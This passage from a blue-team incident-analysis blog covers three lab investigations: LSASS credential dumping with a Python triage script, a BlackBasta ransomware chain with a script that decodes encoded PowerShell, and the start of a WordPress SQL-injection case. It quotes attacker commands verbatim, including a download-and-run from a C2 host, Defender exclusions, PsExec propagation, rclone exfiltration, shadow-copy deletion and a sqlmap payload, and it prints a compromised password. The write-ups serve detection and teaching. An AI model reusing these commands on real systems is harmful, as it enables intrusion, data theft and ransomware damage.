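includes PROCESS_VM_READ from a source image outside an allowlist, and treats an
unbacked (UNKNOWN) frame in the CallTrace as a second indicator. The events
below are constructed to resemble the 17:27 access described in the post; the
allowlist is an assumption to tune per environment.
"""
PROCESS_ACCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
PROCESS_VM_READ = 0x0010

# Processes that legitimately open LSASS with read access on a typical host (assumption).
LSASS_READER_ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\lsass.exe",
}

def decode_access(mask):
    """Return the PROCESS_* right names set in a GrantedAccess mask (int or '0x..' string)."""
    if isinstance(mask, str):
        mask = int(mask, 16)
    return [name for bit, name in sorted(PROCESS_ACCESS_RIGHTS.items()) if mask & bit]

def is_suspicious_lsass_access(event, allowlist=LSASS_READER_ALLOWLIST):
    """True when an Event 10 reads LSASS memory from a non-allowlisted source image."""
    if event.get("EventID") != 10:
        return False
    if not event["TargetImage"].lower().endswith(r"\lsass.exe"):
        return False
    if not int(event["GrantedAccess"], 16) & PROCESS_VM_READ:
        return False
    return event["SourceImage"].lower() not in allowlist

def triage_lsass_access(events):
    """One finding per suspicious access, with the decoded rights and whether the
    call stack contains unbacked code (typical of injected or reflective tooling)."""
    findings = []
    for ev in events:
        if not is_suspicious_lsass_access(ev):
            continue
        findings.append({
            "time": ev["UtcTime"],
            "source": ev["SourceImage"],
            "rights": decode_access(ev["GrantedAccess"]),
            "unbacked_frames": "UNKNOWN" in ev.get("CallTrace", ""),
        })
    return findings

# Constructed Sysmon 10 events; offsets and call traces are illustrative, not from the post.
SAMPLE_EVENTS = [
    {"EventID": 10, "UtcTime": "2024-09-09 17:27:36",
     "SourceImage": r"C:\Users\Public\Backup_Tools\mimikatz.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4|C:\Users\Public\Backup_Tools\mimikatz.exe+2f1a7"},
    {"EventID": 10, "UtcTime": "2024-09-09 17:27:40",
     "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4|C:\Windows\SYSTEM32\csrss.exe+1a21"},
    {"EventID": 10, "UtcTime": "2024-09-09 17:28:01",
     "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4|UNKNOWN(000001E2A4B30000)"},
    {"EventID": 10, "UtcTime": "2024-09-09 17:28:30",
     "SourceImage": r"C:\Program Files\Example EDR\sensor.exe",   # hypothetical vendor path
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4"},
    {"EventID": 10, "UtcTime": "2024-09-09 17:29:00",
     "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4"},
]

if __name__ == "__main__":
    for f in triage_lsass_access(SAMPLE_EVENTS):
        print(f["time"], f["source"], "+".join(f["rights"]),
              "unbacked-code" if f["unbacked_frames"] else "")
```

Two of the five constructed events fire: the mimikatz read, and a PowerShell read whose call stack passes through unbacked memory, which is what an in-memory dumper looks like when the binary on disk is not the tool. The query-only EDR sensor and the csrss handle do not, which is the point of keying on PROCESS_VM_READ rather than on any access at all.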
At 17:42:21 BackupRunner.exe was created in C:\\Users\\Public\\ and executed at 17:42:27, establishing an additional execution foothold on the domain controller.\nCollection and Exfiltration Staging # At 17:53:10 on ST-FS01, SECURETECH\\jsmith used PowerShell to create C:\\Users\\Public\\Documents\\Archive_8673812.zip (Sysmon Event ID 11), staging collected data into a single archive in a world-readable directory in preparation for exfiltration. The logs quoted here show the staging only; confirm the transfer from network or proxy data before recording it as exfiltration.\nIOCs # Type - Value - Description\nIP - 77.91.78.115 - attacker IP, nuxtcloud AS216127, 25,047 AbuseIPDB reports\nHost - ST-WIN02 - initial compromised host\nHost - ST-DC01 - domain controller, lateral movement target\nHost - ST-FS01 - file server, lateral movement and exfiltration staging target\nDomain - SECURETECH - compromised AD domain\nFile - C:\\Windows\\Temp\\OfficeUpdater.exe - malicious dropper masquerading as Office updater\nFile - C:\\Users\\Public\\Backup_Tools.zip - attacker toolkit archive\nFile - C:\\Users\\Public\\Backup_Tools\\mimikatz.exe - credential dumping tool\nFile - C:\\Users\\Public\\Backup_Tools\\PsExec.exe - lateral movement tool\nFile - C:\\Users\\Public\\Backup_Tools\\PowerView.ps1 - AD reconnaissance framework\nFile - C:\\Windows\\Temp\\FileCleaner.exe - persistence payload on ST-DC01\nFile - C:\\Users\\Public\\BackupRunner.exe - secondary payload on ST-DC01\nFile - C:\\Users\\Public\\Documents\\Archive_8673812.zip - staged exfiltration archive on ST-FS01\nRegistry - HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\OfficeUpdater - persistence Run key\nTask - FilesCheck - scheduled task on ST-DC01, hourly SYSTEM execution of FileCleaner.exe\nAccount - michaelwilliams - initial brute-forced local account on ST-WIN02\nAccount - SECURETECH\\mwilliams - brute-forced domain account, elevated token\nAccount - SECURETECH\\jsmith - account obtained via LSASS dump, used for lateral movement\nAttack Timeline # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff',
'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef access fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef persist fill:#f3e5f5,stroke:#6a1b9a,stroke-width:2px,color:#000; classDef cred fill:#fff3e0,stroke:#e65100,stroke-width:2px,color:#000; classDef lateral fill:#e8f5e9,stroke:#2e7d32,stroke-width:2px,color:#000; classDef exfil fill:#fce4ec,stroke:#880e4f,stroke-width:2px,color:#000; A([77.91.78.115 - kali]):::default --\u003e B[16:29:05 - Brute-force beginsEvent ID 4625 - ST-WIN02]:::access B --\u003e C[16:56:05 - michaelwilliams compromisedlocal account ST-WIN02]:::access C --\u003e D[17:00 - mwilliams SECURETECHelevated token NTLM v2]:::access D --\u003e E[17:00:22 - RDP session establishedEvent ID 1149 ST-WIN02]:::access subgraph Exec [Execution and Persistence - ST-WIN02] E --\u003e F[17:12:14 - PowerShell dropsOfficeUpdater.exe in Temp]:::exec F --\u003e G[reg add HKLM Run OfficeUpdaterHigh integrity persistence]:::persist G --\u003e H[17:22:57 - Backup_Tools.zip extractedmimikatz.exe PsExec.exe PowerView.ps1]:::exec end subgraph Cred [Credential Dumping - ST-WIN02] H --\u003e I[17:27:34 - mimikatz.exe launchedEvent ID 10 - lsass.exe accessedGrantedAccess: 0x1010]:::cred I --\u003e J[jsmith credentials extracted]:::cred end subgraph Lateral [Lateral Movement] J --\u003e K[17:34:15 - jsmith logonST-DC01 from 77.91.78.115]:::lateral K --\u003e L[17:37:00 - FileCleaner.exe droppedschtasks FilesCheck SYSTEM hourly]:::persist L --\u003e M[17:42:27 - BackupRunner.exe executedST-DC01]:::exec M --\u003e N[17:50:13 - jsmith logonST-FS01 from 77.91.78.115]:::lateral end subgraph Exfil [Collection] N --\u003e O[17:53:10 - PowerShell createsArchive_8673812.zip on ST-FS01]:::exfil end ","date":"April 10, 2026","externalUrl":null,"permalink":"/blue_team/splunk-goldenspray/","section":"","summary":"An attacker from 
77.91.78.115 brute-forced mwilliams credentials, connected via RDP, dropped OfficeUpdater.exe with registry persistence, staged Backup_Tools including mimikatz, dumped lsass to obtain jsmith credentials, laterally moved to ST-DC01 and ST-FS01, established scheduled task persistence on the DC, and archived client data for exfiltration.","title":"Splunk-GoldenSpray","type":"blue_team"},{"content":"","date":"April 9, 2026","externalUrl":null,"permalink":"/tags/blackbasta/","section":"Tags","summary":"","title":"BlackBasta","type":"tags"},{"content":" TL;DR # A finance employee (FINANCEES\\knixon) downloaded Financial Records.zip from attacker-controlled server 54.93.105.22 via Microsoft Edge. The extracted Financial Records.xlsm macro executed an encoded PowerShell command that downloaded and ran F6w1S48.vbs, which loaded WindowsUpdaterFX.dll via regsvr32.exe. The DLL added Windows Defender exclusions, established persistence via a registry Run key and a scheduled task, then dropped Pancake.jpg.exe as a C2 backdoor connecting back to 54.93.105.22:80. The attacker enumerated the host and domain, scanned the internal subnet, downloaded PsExec64 via bitsadmin, and laterally moved to a second host using financees.local\\swhite credentials. From there, C:\\clients was archived and exfiltrated to MEGA via rclone, the system was configured to boot into Safe Mode, shadow copies were deleted as SYSTEM, and the final BlackBasta ransomware payload 6as98v.exe was deployed.\nInitial Access # I began the investigation in Kibana by filtering for Sysmon Event ID 15 (FileCreateStreamHash). Sysmon logs this event whenever a process creates a named alternate data stream; browsers write the Zone.Identifier stream (the Mark of the Web) to every file they download, so the event records the internet origin of the file and, for most browsers, the source URL. It is a reliable starting point for identifying browser downloads, with one caveat: a file that arrives inside a container that drops the mark (some archive tools, ISO images) or through a client that does not write the stream produces no Event 15.\nAt 2025-03-21 15:08:22 user FINANCEES\\knixon downloaded Financial Records.zip through msedge.exe.
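The two fields that carry this whole chain, summarized in the TL;DR above, are the Zone.Identifier contents that Event ID 15 records and the encoded command line of the PowerShell process the macro spawned. The script below is an added example for this page, not code from the original post or from Sysmon: it parses the Zone.Identifier stream, decodes a PowerShell -EncodedCommand argument (base64 of UTF-16LE text), extracts the URLs from both, and reports when a later command reaches back to the host that served the original download. The events are constructed to match the chain described here; the encoded blob is generated from the decoded command the post shows, and the ReferrerUrl value is invented.

```python
"""Download-origin and encoded-command triage over Sysmon events.

Added example for this writeup, not code from the original post or from Sysmon.
It parses the Zone.Identifier stream contents that Sysmon Event ID 15 records,
decodes a PowerShell -EncodedCommand (base64 of UTF-16LE text) found in an
Event ID 1 command line, pulls the URLs out of both, and reports when a later
command reaches back to the host that served the original download. The events
are constructed to match the chain in the post; the encoded blob is generated
here from the decoded command the post shows, and the ReferrerUrl is invented.
"""
import base64
import re
from urllib.parse import urlparse

def parse_zone_identifier(contents):
    """Parse the INI-style Zone.Identifier stream; ZoneId becomes an int."""
    fields = {}
    for line in contents.splitlines():
        line = line.strip()
        if not line or line.startswith("["):
            continue
        key, _, value = line.partition("=")
        fields[key.strip()] = value.strip()
    if "ZoneId" in fields:
        fields["ZoneId"] = int(fields["ZoneId"])
    return fields

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_PREFIXES = "|".join("encodedcommand"[:i] for i in range(1, 15))
ENC_FLAG = re.compile(r"(?:^|\s)[-/](?:%s)\s+([A-Za-z0-9+/=]{8,})" % _PREFIXES, re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.I)

def decode_encoded_command(command_line):
    """Return the decoded script for an -EncodedCommand argument, else None."""
    m = ENC_FLAG.search(command_line)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)          # operators sometimes strip the padding
    return base64.b64decode(blob).decode("utf-16-le", errors="replace")

def triage(events, download_zone=3):
    """events: dicts with EventID plus Contents (15) or CommandLine (1).
    Returns findings: internet downloads, and decoded commands with the hosts
    they contact and whether any host already served a download."""
    download_hosts = set()
    findings = []
    for ev in events:
        if ev["EventID"] == 15 and "Contents" in ev:
            zi = parse_zone_identifier(ev["Contents"])
            if zi.get("ZoneId", 0) >= download_zone and "HostUrl" in zi:
                host = urlparse(zi["HostUrl"]).hostname
                download_hosts.add(host)
                findings.append({"kind": "internet_download", "host": host,
                                 "url": zi["HostUrl"], "file": ev.get("TargetFilename")})
        elif ev["EventID"] == 1 and "CommandLine" in ev:
            decoded = decode_encoded_command(ev["CommandLine"])
            if decoded is None:
                continue
            hosts = {urlparse(u).hostname for u in URL_RE.findall(decoded)}
            findings.append({"kind": "encoded_command", "image": ev["Image"],
                             "decoded": decoded, "hosts": sorted(hosts),
                             "reaches_download_host": bool(hosts & download_hosts)})
    return findings

# Constructed events shaped like the ones in the post.
DECODED_COMMAND = ("Invoke-WebRequest -Uri 'http://54.93.105.22/F6w1S48.vbs' "
                   "-OutFile \"$env:LOCALAPPDATA\\Temp\\F6w1S48.vbs\"; "
                   "cmd.exe /c \"$env:LOCALAPPDATA\\Temp\\F6w1S48.vbs\"")
ENCODED = base64.b64encode(DECODED_COMMAND.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"EventID": 15, "Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "TargetFilename": r"C:\Users\knixon\Downloads\Financial Records.zip:Zone.Identifier",
     "Contents": "[ZoneTransfer]\r\nZoneId=3\r\nReferrerUrl=http://54.93.105.22/\r\n"
                 "HostUrl=http://54.93.105.22/Financial%20Records.zip\r\n"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -enc " + ENCODED},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["kind"], f.get("host") or f["hosts"], f.get("reaches_download_host", ""))
```

The correlation at the end is the useful part: a decoded command that fetches from the same host a browser download came from ties delivery and second stage to one indicator, which is exactly the relationship this post establishes by hand.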
The winlog.event_data.Contents field showed ZoneId=3 HostUrl=http://54.93.105.22/Financial%20Records.zip, confirming the file originated from the internet zone and identifying the attacker\u0026rsquo;s staging server. The file was saved to knixon\u0026rsquo;s Downloads folder with SHA256 1CAAEBE93B73AD6C24193EF2D20548FE2E3F82FCDFF2D0B4A09211B61ADC1F6C.\nExecution Chain # Excel Macro # At 15:09:03 the user extracted and opened Financial Records.xlsm (SHA256: 030E7AD9B95892B91A070AC725A77281645F6E75CFC4C88F53DBF448FFFD1E15). Excel then recorded the file as a trusted document under the Excel security registry key:\nHKU\\S-1-5-21-3865674213-28386648-2675066931-1120\\SOFTWARE\\Microsoft\\Office\\16.0\\Excel\\Security\\Trusted Documents\\TrustRecords\\%USERPROFILE%/Downloads/Financial%20Records.xlsm\nExcel writes a TrustRecords entry when the user clicks Enable Content, so this value is evidence that knixon enabled the macro; a macro cannot register its own trust, because it does not run until the document has already been trusted. Once present, the entry suppresses the security warning on subsequent opens. It also implies that the .xlsm no longer carried the Mark of the Web when content was enabled (either the extraction did not propagate it or the user unblocked the file), since current Office versions block macros outright on internet-marked files rather than offering the Enable Content prompt - worth checking how the zip was extracted. At 15:09:32 the macro spawned powershell.exe.\nDecoding the base64 payload revealed:\nInvoke-WebRequest -Uri \u0026#39;http://54.93.105.22/F6w1S48.vbs\u0026#39; -OutFile \u0026#34;$env:LOCALAPPDATA\\Temp\\F6w1S48.vbs\u0026#34;\ncmd.exe /c \u0026#34;$env:LOCALAPPDATA\\Temp\\F6w1S48.vbs\u0026#34;\nThe macro downloaded a VBScript from the C2 server and executed it in the same command; cmd.exe /c on a .vbs path hands the file to the registered script host, which is why the next process in the chain is wscript.exe.\nVBS and DLL Loading # At 15:15:29 wscript.exe executed F6w1S48.vbs from the user\u0026rsquo;s Temp directory.\nThe script invoked regsvr32.exe /s C:\\Users\\knixon\\AppData\\Local\\Temp\\WindowsUpdaterFX.dll. regsvr32 is a legitimate Windows binary used to register COM DLLs - abusing it to load a malicious DLL is a well-known LOLBin technique (T1218.010) that bypasses application control since the host process is a signed Microsoft binary; the DLL\u0026rsquo;s DllRegisterServer export runs with no further user interaction.\nPersistence and Defense Evasion # Within the same second at 15:15, WindowsUpdaterFX.dll (MD5: 735AB5713DB79516CF350265FA7574E5) executed a series of commands.
It added three Windows Defender exclusion paths to prevent detection of its artifacts:\nAdd-MpPreference -ExclusionPath \u0026#34;C:\\ProgramData\\Microsoft\\ssh\u0026#34;\nAdd-MpPreference -ExclusionPath \u0026#34;%APPDATA%/Microsoft\u0026#34;\nAdd-MpPreference -ExclusionPath \u0026#34;%LOCALAPPDATA%/Temp\u0026#34;\nAdd-MpPreference needs administrative rights, and every exclusion change is recorded by Defender as Event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log, which makes this step a cheap, high-fidelity detection point. It then wrote a registry Run key to maintain persistence across user logons:\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WindowsUpdater = wscript.exe %LOCALAPPDATA%/Temp/F6w1S48.vbs\nA second persistence mechanism was established via a scheduled task WiindowsUpdate (note the doubled i, a typosquat of a plausible Windows task name) configured to execute as SYSTEM on every logon:\nschtasks /Create /RU \u0026#34;NT AUTHORITY\\SYSTEM\u0026#34; /SC ONLOGON /TN \u0026#34;WiindowsUpdate\u0026#34; /TR \u0026#34;C:\\Windows\\System32\\regsvr32.exe /s %%localappdata%%\\Temp\\WindowsUpdaterFX.dll\u0026#34;\nOne caveat before treating this task as working persistence: an action running as SYSTEM expands %localappdata% against the SYSTEM profile (C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local), not against knixon\u0026rsquo;s, so unless the DLL was also staged there the task would fail to find it; the Task Scheduler operational log shows whether it ever ran. Dropper and C2 Backdoor # The DLL created C:\\Users\\knixon\\AppData\\Local\\Temp\\Pancake.jpg.exe - the double extension .jpg.exe is a masquerading technique exploiting the Windows default of hiding known file extensions, making the binary appear as an image.\nIt then launched the binary via Start-Process $env:LOCALAPPDATA\\Temp\\Pancake.jpg.exe. The process (PID 10292) immediately established an outbound connection from 10.10.11.29 to 54.93.105.22 over port 80 - the same host that served the zip and the VBS, so one network indicator covers delivery, staging and C2.\nDiscovery and Reconnaissance # Host Enumeration # With the C2 channel active, the attacker issued discovery commands through Pancake.jpg.exe spawning child cmd.exe processes at roughly one-minute intervals.\nNetwork Scanning and Tool Staging # At 15:42 the attacker deployed netscan.exe to scan the internal subnet 10.10.11.1-10.10.255.255 for live hosts and open services. To enable lateral movement, bitsadmin - another LOLBin - was used to download PsExec64.exe from a GitHub repository into the knixon Temp folder.
PsExec is a Sysinternals tool that enables remote process execution on other hosts using valid credentials.\nLateral Movement # With PsExec64.exe staged, the attacker used compromised credentials financees.local\\swhite with password b\u0026lt;ZITx4h1 to authenticate to 10.10.11.170. Initial validation commands whoami and hostname confirmed remote execution was working. The attacker then propagated the implant using:\nPsExec64.exe \\\\financees.local -accepteula -s -c -f Pancake.jpg.exe\nThe -c -f flags copy the executable to the remote host\u0026rsquo;s ADMIN$ share and force-overwrite any existing copy, and -s runs it as SYSTEM. On the target this leaves the standard PsExec artifacts: a PSEXESVC service installation (System log Event ID 7045) and PSEXESVC.exe alongside the copied payload under C:\\Windows\\.\nCollection and Exfiltration # Operating in the context of swhite, the attacker collected sensitive data by compressing C:\\clients into data.zip. The archive was then exfiltrated to cloud storage using rclone copy data.zip mega:data - rclone is a cloud sync utility frequently abused for data exfiltration (T1567.002) because traffic to MEGA blends with normal cloud storage activity and is rarely blocked. The mega: remote has to be defined in an rclone configuration file (by default %APPDATA%\\rclone\\rclone.conf), which is a companion artifact worth collecting.\nPre-Ransomware Staging # Before deploying the encryptor, the attacker executed bcdedit.exe /set safeboot network to configure the system to reboot into Safe Mode with networking. This technique disables most security software and EDR agents that do not load in Safe Mode, ensuring the ransomware can encrypt files without interference; it needs administrative rights and takes effect only at the next reboot, so a safeboot change outside a change window is a reliable pre-ransomware alert. At 16:47:19 curl downloaded the final payload 6as98v.exe from http://54.93.105.22/6as98v.exe into C:\\Users\\swhite\\AppData\\Local\\Temp\\.\nRansomware Execution and Cleanup # Shadow Copy Deletion # Shadow copies were deleted as NT AUTHORITY\\SYSTEM using vssadmin.exe delete shadows /all /quiet - a standard ransomware anti-recovery step (T1490) that removes Windows Volume Shadow Copies to prevent file restoration without paying the ransom.\nRansomware Deployment # At 16:49:19 6as98v.exe (PID 5792, MD5: 998022B70D83C6DE68E5BDF94E0F8D71) was executed.
VirusTotal confirmed 61/71 vendors flagged this sample as ransomware.blackbasta/basta - BlackBasta is a ransomware-as-a-service operation known for double extortion attacks targeting enterprise environments.\nAt 16:52:52 and 16:53:30 the attacker ran cleanup commands to remove forensic artifacts from both Temp directories:\nRemove-Item -Path \u0026#34;$env:LOCALAPPDATA\\Temp\\*\u0026#34; -Recurse -Force\nRemove-Item -Path \u0026#34;C:\\Users\\swhite\\Appdata\\Local\\Temp\\*\u0026#34; -Recurse -Force\nThis removes the dropper, the DLL and the backdoor from disk, so the Sysmon records (and any antivirus quarantine) are the remaining sources for the samples.\nIOCs # Type - Value - Description\nIP - 54.93.105.22 - Attacker C2 server - payload staging and beaconing\nFile - Financial Records.zip - SHA256: 1CAAEBE93B73AD6C24193EF2D20548FE2E3F82FCDFF2D0B4A09211B61ADC1F6C\nFile - Financial Records.xlsm - SHA256: 030E7AD9B95892B91A070AC725A77281645F6E75CFC4C88F53DBF448FFFD1E15\nFile - F6w1S48.vbs - VBScript dropper - %LOCALAPPDATA%\\Temp\\\nFile - WindowsUpdaterFX.dll - MD5: 735AB5713DB79516CF350265FA7574E5 - malicious DLL via regsvr32\nFile - Pancake.jpg.exe - C2 backdoor - %LOCALAPPDATA%\\Temp\\\nFile - 6as98v.exe - MD5: 998022B70D83C6DE68E5BDF94E0F8D71 - BlackBasta ransomware, 61/71 VT\nRegistry - HKCU\\...\\CurrentVersion\\Run\\WindowsUpdater - Persistence Run key\nTask - WiindowsUpdate - Scheduled task - runs DLL as SYSTEM on logon\nAccount - FINANCEES\\knixon - Initial compromised account\nAccount - financees.local\\swhite - Lateral movement account, password: b\u0026lt;ZITx4h1\nAttack Timeline # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef access fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef persist fill:#f3e5f5,stroke:#6a1b9a,stroke-width:2px,color:#000; classDef lateral fill:#fff3e0,stroke:#e65100,stroke-width:2px,color:#000; classDef exfil
fill:#fce4ec,stroke:#880e4f,stroke-width:2px,color:#000; classDef ransom fill:#b71c1c,stroke:#7f0000,stroke-width:2px,color:#fff; A([FINANCEES\\knixon10.10.11.29]):::default --\u003e B[15:08:22 - Edge downloadsFinancial Records.zipfrom 54.93.105.22]:::access B --\u003e C[15:09:03 - Financial Records.xlsmmacro self-trusts and executes]:::exec C --\u003e D[15:09:32 - Encoded PowerShelldownloads F6w1S48.vbs]:::exec D --\u003e E[15:15:29 - wscript.exe runs F6w1S48.vbsPID 8732]:::exec E --\u003e F[15:15:34 - regsvr32.exe loadsWindowsUpdaterFX.dll PID 8592]:::exec subgraph Persist [Persistence and Defense Evasion] F --\u003e G[15:15 - Defender exclusions addedRun key and WiindowsUpdate task created]:::persist G --\u003e H[Pancake.jpg.exe droppedC2 beacon to 54.93.105.22:80]:::persist end subgraph Discovery [Discovery] H --\u003e I[15:17-15:22 - whoami ipconfigsysteminfo net group domain admins]:::exec I --\u003e J[15:42 - netscan.exe subnet scanbitsadmin downloads PsExec64.exe]:::exec end subgraph Lateral [Lateral Movement] J --\u003e K[PsExec64 with swhite credentialsto 10.10.11.170 and financees.local DC]:::lateral end subgraph Exfil [Collection and Exfiltration] K --\u003e L[Compress-Archive C:\\clients data.ziprclone copy data.zip mega:data]:::exfil L --\u003e M[bcdedit /set safeboot networkcurl downloads 6as98v.exe]:::exfil end subgraph Ransom [Impact] M --\u003e N[vssadmin delete shadows /all /quietNT AUTHORITY\\SYSTEM]:::ransom N --\u003e O[16:49:19 - BlackBasta executedPID 5792MD5: 998022B70D83C6DE68E5BDF94E0F8D71]:::ransom O --\u003e P[16:52-16:53 - PowerShellRemove-Item Temp cleanup]:::ransom end ","date":"April 9, 2026","externalUrl":null,"permalink":"/blue_team/elk-black-basta/","section":"","summary":"A finance employee opened a malicious Excel macro from a drive-by download, which executed a VBS dropper, loaded WindowsUpdaterFX.dll via regsvr32, established persistence, dropped Pancake.jpg.exe as a C2 backdoor, performed internal reconnaissance, laterally 
moved to a domain controller via PsExec using compromised credentials, exfiltrated client data to MEGA via rclone, deleted shadow copies, and deployed BlackBasta ransomware.","title":"ELK-Black Basta","type":"blue_team"},{"content":"","date":"April 9, 2026","externalUrl":null,"permalink":"/tags/mega/","section":"Tags","summary":"","title":"MEGA","type":"tags"},{"content":"","date":"April 8, 2026","externalUrl":null,"permalink":"/tags/ad-cs/","section":"Tags","summary":"","title":"AD CS","type":"tags"},{"content":"","date":"April 8, 2026","externalUrl":null,"permalink":"/tags/cve-2021-24762/","section":"Tags","summary":"","title":"CVE-2021-24762","type":"tags"},{"content":" TL;DR # An attacker operating from 47.128.63.0 targeted a WordPress installation at feefaworldcup.co.th. After scanning with Nmap Scripting Engine and WPScan v3.8.28, the attacker identified the Perfect Survey plugin and exploited CVE-2021-24762 - an unauthenticated SQL injection in the get_question AJAX action - using sqlmap 1.9.3. A multi-vector UNION+XSS+RCE probe confirmed the injection at 02:25:31, and systematic blind SQLi extraction of user_pass from wordpress.wp_users ran until 03:11:50. Using cracked credentials, the attacker accessed mourinho.j at 02:35, Kerberoasted alonso.x with RC4-HMAC encryption at 02:40, then at 02:50 created a rogue computer account MADRID$, abused Resource-Based Constrained Delegation against APP-BKUP01$, and at 02:54 exploited Active Directory Certificate Services with a forged SAN for administrator@worldcup.ball to achieve full domain compromise on PACIFIC-DC.worldcup.ball.\nInitial Triage # Knowing a web attack had occurred, I started the investigation in Kibana by analyzing access.log - the HTTP access log ingested from the target web server. 
I examined the source.address field distribution to identify the dominant traffic source.\n47.128.63.0 accounted for 99.6% of all 2,524 records, with the remaining 0.4% from 192.168.18.29 - almost certainly internal traffic. I filtered all subsequent queries to source.address: 47.128.63.0 and examined the http.response.status_code field to understand the nature of the requests.\nThe distribution showed 200 at 49.8% and 404 at 44.3%, a pattern typical of automated scanning tools that probe many paths and receive 404 for non-existent resources while successfully hitting valid endpoints. This confirmed the traffic was tool-generated rather than manual browsing.\nReconnaissance # Nmap NSE # I sorted the filtered events chronologically to trace the attacker\u0026rsquo;s activity from the beginning. The first significant hit at Sep 18, 2025 02:12:30 showed a GET request to /wordpress/ with a response of 200 from User-Agent Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) - Nmap NSE is the scripting engine component of the Nmap network scanner, used here to fingerprint the web application.\nWPScan # At 02:19:21 the User-Agent switched to WPScan v3.8.28 - a dedicated WordPress vulnerability scanner - with the same /wordpress/ target, indicating the attacker confirmed a WordPress installation from the Nmap results and escalated to targeted CMS scanning.\nWPScan enumerated plugin paths, returning 200 responses for /wordpress/wp-content/plugins/elementor/readme.txt, /wordpress/wp-content/plugins/perfect-survey/readme.txt, /wordpress/wp-content/plugins/solace-extra/readme.txt, and /wordpress/wp-content/plugins/user-registration/readme.txt. 
At 02:20:04 it requested /wordpress/wp-includes/version.php, which returned 200. On a working PHP installation that file executes server-side and returns an empty body (it only assigns $wp_version and related variables), so the 200 does not by itself leak the version; WPScan fingerprints the core version from readme.html, the generator meta tag and ?ver= query strings on assets, and only a misconfigured server that serves PHP source would disclose version.php directly.\nWPScan also accessed /wordpress/wp-cron.php - WordPress\u0026rsquo;s built-in task scheduler endpoint. WPScan reports an externally reachable wp-cron.php as a denial-of-service exposure; it is not a code-execution surface on its own.\nInitial access # At 02:23:39 the attacker issued a single clean GET request to /wordpress/wp-admin/admin-ajax.php?action=get_question\u0026amp;question_id=1 with User-Agent sqlmap/1.9.3. This was the initial endpoint probe against the Perfect Survey plugin\u0026rsquo;s get_question AJAX action, and its response is the baseline sqlmap compares every later request against.\nSQL Injection - CVE-2021-24762 # CVE-2021-24762 (CVSS 9.8 Critical) affects Perfect Survey versions before 1.5.2 - the plugin passes the question_id GET parameter directly into a SQL query without validation or sanitization. The plugin exposes get_question to unauthenticated callers (the wp_ajax_nopriv_ hook), so no credentials are required to reach this attack surface.\nAt 02:25:31, 2 minutes after the initial probe, sqlmap sent the following payload (URL-decoded):\nGET /wordpress/wp-admin/admin-ajax.php?action=get_question\u0026amp;question_id=1\u0026amp;KpuO=5677 AND 1=1 UNION ALL SELECT 1,NULL,\u0026#39;\u0026lt;script\u0026gt;alert(\u0026#34;XSS\u0026#34;)\u0026lt;/script\u0026gt;\u0026#39;,table_name FROM information_schema.tables WHERE 2\u0026gt;1--/**/; EXEC xp_cmdshell(\u0026#39;cat ../../../etc/passwd\u0026#39;)#\nThis is not a tailored exploit but sqlmap\u0026rsquo;s WAF/IPS detection probe: it appends a randomly named parameter (KpuO=5677) carrying a deliberately noisy 